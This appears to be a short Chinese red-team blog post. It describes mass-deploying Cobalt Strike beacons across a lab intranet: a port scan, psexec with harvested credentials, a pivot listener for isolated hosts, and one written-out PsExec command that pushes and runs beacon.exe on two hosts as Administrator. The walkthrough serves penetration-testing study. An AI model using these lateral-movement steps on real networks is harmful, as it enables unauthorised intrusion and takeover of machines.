Cobalt Strike内网环境批量上线
0x00 环境
环境:
windows 2008:192.168.241.171
windows 2008 x2:192.168.241.172
windows 7:192.168.241.1560x01 内网可出网情况
首先windows7上线了,执行一波portscan
点击视图->目标可以看到扫出来开发的机子
获取登录密码通过cs自带的psexec执行ipc$批量
选中要进行测试的机子
选择对应的凭证
选择会话(补图)
等上线就好
0x02 内网不可出网情况
先将可出网的一台机设置中转
生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令
PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Windows\Temp\beacon.exe1
等上线
在上线成功的机子上可以看到是通过192.168.241.156这台机的4444端口流量出网的
ssh批量登录的方法和图1差不多
文章来源:https://422926799.github.io/posts/b9889b8f.html
无害实验室sec
研究方向:WEB渗透,红蓝对抗,CTF,暂不接广告谢谢
24篇原创内容
公众号
最后
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
无害实验室拥有对此文章的修改和解释权
无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的
赞 (0)